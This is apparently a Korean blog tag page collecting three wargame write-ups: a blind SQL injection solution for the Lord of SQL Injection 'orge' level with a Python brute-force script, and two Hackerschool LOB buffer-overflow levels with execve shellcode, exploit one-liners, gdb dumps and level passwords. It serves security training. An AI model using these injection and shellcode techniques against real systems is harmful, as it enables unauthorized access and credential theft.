'orge' 태그의 글 목록

orge

LORD OF SQL INJECTION [orge] 풀이 2019.10.28
해커스쿨 LOB LEVEL8 [orge -> troll] 풀이 2018.02.11
해커스쿨 LOB LEVEL7 [darkelf-> orge] 풀이 2018.02.11 3

PREV 1 NEXT

LORD OF SQL INJECTION [orge] 풀이

2019. 10. 28. 08:00

https://los.rubiya.kr

ORGE

소스 :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 
  highlight_file(__FILE__); 
?>
Colored by Color Scripter

cs

if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");

이전 문제와 같이 or 과 and를 필터링 하고 있다. || 와 && 으로 우회해주면 된다.

if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge");

입력한 pw가 저장된 pw와 같아야 한다.

orc 문제를 풀었을 때 사용했던 코드를 이용해서 blind SQL Injection을 해주면 된다.

orc 문제풀이:

https://mandu-mandu.tistory.com/302?category=772020

LORD OF SQL INJECTION [orc] 풀이

https://los.rubiya.kr Lord of SQLInjection los.rubiya.kr 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

mandu-mandu.tistory.com

패스워드의 길이를 구해준다.

https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=1%27%20 ||%20%271%27=%271%27%20%26%26length(pw)=8%23

query : select id from prob_orge where id='guest' and pw='1' || '1'='1' &&length(pw)=8#'

풀이 코드:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

import urllib
import urllib2
import sys
import time
 
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$^&*()-_+="
key = ""
 
for i in range(8):
    for j in range(len(string)):
        payload = "1' || '1'='1' &&(substring(pw,"+str(i+1)+",1)='"+string[j]+"')#"
        payload = urllib.quote(payload)
        url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw="+payload
 
        print url
 
        opener = urllib2.build_opener(urllib2.HTTPHandler)
        request = urllib2.Request(url)
        request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
        request.add_header('Cookie', 'PHPSESSID=your_cookie_vaule_here')
        request.get_method = lambda:'GET'
        data = opener.open(request)
        data = data.read()
 
        if "Hello admin" in data:
            key += string[j]
            print "[*] Find Password!! Password is ["+key+"]"
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
 
Colored by Color Scripter

cs

pw을 구할 수 있다.

저작자표시 비영리 동일조건

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

LORD OF SQL INJECTION [VAMPIRE] 풀이 (0)	2019.10.30
LORD OF SQL INJECTION [troll] 풀이 (0)	2019.10.29
LORD OF SQL INJECTION [darkelf] 풀이 (0)	2019.10.27
LORD OF SQL INJECTION [wolfman] 풀이 (0)	2019.10.26
LORD OF SQL INJECTION [orc] 풀이 (0)	2019.10.25

해커스쿨 LOB LEVEL8 [orge -> troll] 풀이

2018. 2. 11. 19:57

해커스쿨 LOB LEVEL8 [orge -> troll] 풀이

M4ndU

해커스쿨 LOB [orge -> troll] 풀이입니다.

ID | orge

PW | timewalker

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

$ bash2

그리고

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat [문제이름].c

를 이용해 소스코드를 확인합시다.

Password:

[orge@localhost orge]$ bash2

[orge@localhost orge]$ ls -l

total 20

-rwsr-sr-x 1 troll troll 12693 Mar 1 2010 troll

-rw-r--r-- 1 root root 772 Mar 29 2010 troll.c

[orge@localhost orge]$ cat troll.c

The Lord of the BOF : The Fellowship of the BOF

- troll

- check argc + argv hunter

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

// here is changed

if(argc != 2){

printf("argc must be two!\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

// one more!

memset(argv[1], 0, strlen(argv[1]));

}

// here is changed

if(argc != 2){

printf("argc must be two!\n");

exit(0);

}

이번에는 argv[0] 과 argv[1]밖에 사용할 수 없는데,

// one more!

memset(argv[1], 0, strlen(argv[1]));

argv[1]을 모두 0으로 초기화시켜버리네요.

쉘코드가 들어갈 수 있는 곳은 argv[0]뿐이네요.

파일이름을 쉘코드로 하고 argv[0]의 주소를 리턴주소로 하면 될 것 같습니다.

그러나! 파일명을 변경하려고 하면 없는 파일이라고 되지 않을 것인데요.

그 이유는 쉘코드에 있는 \x2f가 /로 읽혀서 그런 것입니다. 그래서 \x2f가 없는 쉘코드를 사용해야 합니다.

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

[orge@localhost orge]$ rename troll `python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` troll

그다음 tmp폴더에 복사해서 core dump를 일으키고 분석을 합니다.

[orge@localhost orge]$ mkdir tmp

[orge@localhost orge]$ cp `python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` tmp

[orge@localhost orge]$ cd tmp

[orge@localhost tmp]$ ./`python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+" "+"D"*44+"\xff\xff\xff\xbf"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?

Segmentation fault (core dumped)

[orge@localhost tmp]$ gdb -c core -q

Core was generated by `./릱릱릱릱릱릱릱릱릱릱?12l?楕凹2핽i00tii0cjo듾QT듼슧

? '.

Program terminated with signal 11, Segmentation fault.

#0 0xbfffffff in ?? ()

(gdb) x/1000x $esp

0xbffffa40: 0x00000000 0xbffffa84 0xbffffa90 0x40013868

0xbffffa50: 0x00000002 0x08048450 0x00000000 0x08048471

(생략)

0xbffffb70: 0x00000000 0x00000000 0x36383669 0x902f2e00

0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb90: 0xeb909090 0xc9315e11 0x6c8032b1 0x8001ff0e

0xbffffba0: 0xf67501e9 0xeae805eb 0x32ffffff 0x306951c1

0xbffffbb0: 0x69697430 0x6f6a6330 0x5451e48a 0xb19ae28a

0xbffffbc0: 0x0081ce0c 0x00000000 0x00000000 0x00000000

0xbffffb80을 리턴주소로 하겠습니다.

[orge@localhost orge]$ ./`python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+" "+"D"*44+"\x80\xfb\xff\xbf"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD??

bash$ my-pass

euid = 508

aspirin

성공입니다!! 다음레벨로 가Gㅡ아ㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏ

저작자표시 비영리 동일조건

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL10 [vampire -> skeleton] 풀이 (4)	2018.02.11
해커스쿨 LOB LEVEL9 [troll -> vampire] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL7 [darkelf-> orge] 풀이 (3)	2018.02.11
해커스쿨 LOB LEVEL6 [wolfman-> darkelf] 풀이 (1)	2018.02.11
해커스쿨 LOB LEVEL5 [orc -> wolfman] 풀이 (0)	2018.02.11

해커스쿨 LOB LEVEL7 [darkelf-> orge] 풀이

2018. 2. 11. 19:04

해커스쿨 LOB LEVEL7 [darkelf -> orge] 풀이

M4ndU

해커스쿨 LOB [darkelf -> orge] 풀이입니다.

ID | darkelf

PW | kernel crashed

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

$ bash2

그리고

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat [문제이름].c

를 이용해 소스코드를 확인합시다.

Password:

[darkelf@localhost darkelf]$ bash2

[darkelf@localhost darkelf]$ ls -l

total 20

-rwsr-sr-x 1 orge orge 12700 Mar 1 2010 orge

-rw-r--r-- 1 root root 800 Mar 29 2010 orge.c

[darkelf@localhost darkelf]$ cat orge.c

The Lord of the BOF : The Fellowship of the BOF

- orge

- check argv[0]

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// here is changed!

if(strlen(argv[0]) != 77){

printf("argv[0] error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

}

이전 문제에서 바뀐 내용은 argv[0]의 길이가 77이어야 하는거네요.

argv[0]은 ./orge AA BB 에서 ./orge가 해당됩니다.

argv[0]의 길이가 77이 되도록 하려면 "./"를 제외하고 파일이름이 75바이트면 되겠네요.

파일이름을 바꿔줍시다.

[darkelf@localhost darkelf]$ rename orge `python -c 'print "A"*75'` orge

[darkelf@localhost darkelf]$ ls

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

orge.c

그럼 이제 분석을 위해 파일을 복사해주고, argv[2]에 쉘코드를 넣고 위치를 확인해 봅시다.

argv[1] = 'print "D"*44+RET'`

argv[2] = 'python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

[darkelf@localhost darkelf]$ mkdir tmp

[darkelf@localhost darkelf]$ cp AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA tmp/

[darkelf@localhost darkelf]$ cd tmp/

[darkelf@localhost tmp]$ ./`python -c 'print "A"*75+" "+"D"*44+"\xff\xff\xff\xbf"+" "+"\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?

Segmentation fault (core dumped)

[darkelf@localhost tmp]$ gdb -c core -q

Core was generated by `./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA D'.

Program terminated with signal 11, Segmentation fault.

#0 0xbfffffff in ?? ()

(gdb) x/1000x $esp

0xbffff9d0: 0x00000000 0xbffffa14 0xbffffa24 0x40013868

0xbffff9e0: 0x00000003 0x08048450 0x00000000 0x08048471

(생략)

0xbffffb10: 0x00000000 0x00000000 0x00000000 0x38366900

0xbffffb20: 0x2f2e0036 0x41414141 0x41414141 0x41414141

0xbffffb30: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffffb40: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffffb50: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffffb60: 0x41414141 0x41414141 0x41414141 0x00414141

0xbffffb70: 0x44444444 0x44444444 0x44444444 0x44444444

0xbffffb80: 0x44444444 0x44444444 0x44444444 0x44444444

0xbffffb90: 0x44444444 0x44444444 0x44444444 0xbfffffff

0xbffffba0: 0x90909000 0x90909090 0x90909090 0x90909090

0xbffffbb0: 0x90909090 0x50c03190 0x732f2f68 0x622f6868

0xbffffbc0: 0xe3896e69 0xe1895350 0x0bb0c289 0x000080cd

argv[0], argv[1], argv[2] 를 모두 확인할 수 있네요.

쉘코드가 있는 0xbffffbb0를 리턴주소로 하겠습니다.

[darkelf@localhost darkelf]$ ./`python -c 'print "A"*75+" "+"D"*44+"\xb0\xfb\xff\xbf"+" "+"\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD곽?

bash$ my-pass

euid = 507

timewalker

성공입니다. 다음레벨로 GA즈AAAAAAAAAAAAAAAA

저작자표시 비영리 동일조건

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL9 [troll -> vampire] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL8 [orge -> troll] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL6 [wolfman-> darkelf] 풀이 (1)	2018.02.11
해커스쿨 LOB LEVEL5 [orc -> wolfman] 풀이 (0)	2018.02.11
해커스쿨 LOB LEVEL4 [goblin -> orc] 풀이 (0)	2018.02.11

PREV 1 NEXT

M4ndU의 만두만두한 블로그

orge

LORD OF SQL INJECTION [orge] 풀이

ORGE

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

해커스쿨 LOB LEVEL8 [orge -> troll] 풀이

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL7 [darkelf-> orge] 풀이

'System Hacking > LOB Redhat' 카테고리의 다른 글

+ Recent posts

티스토리툴바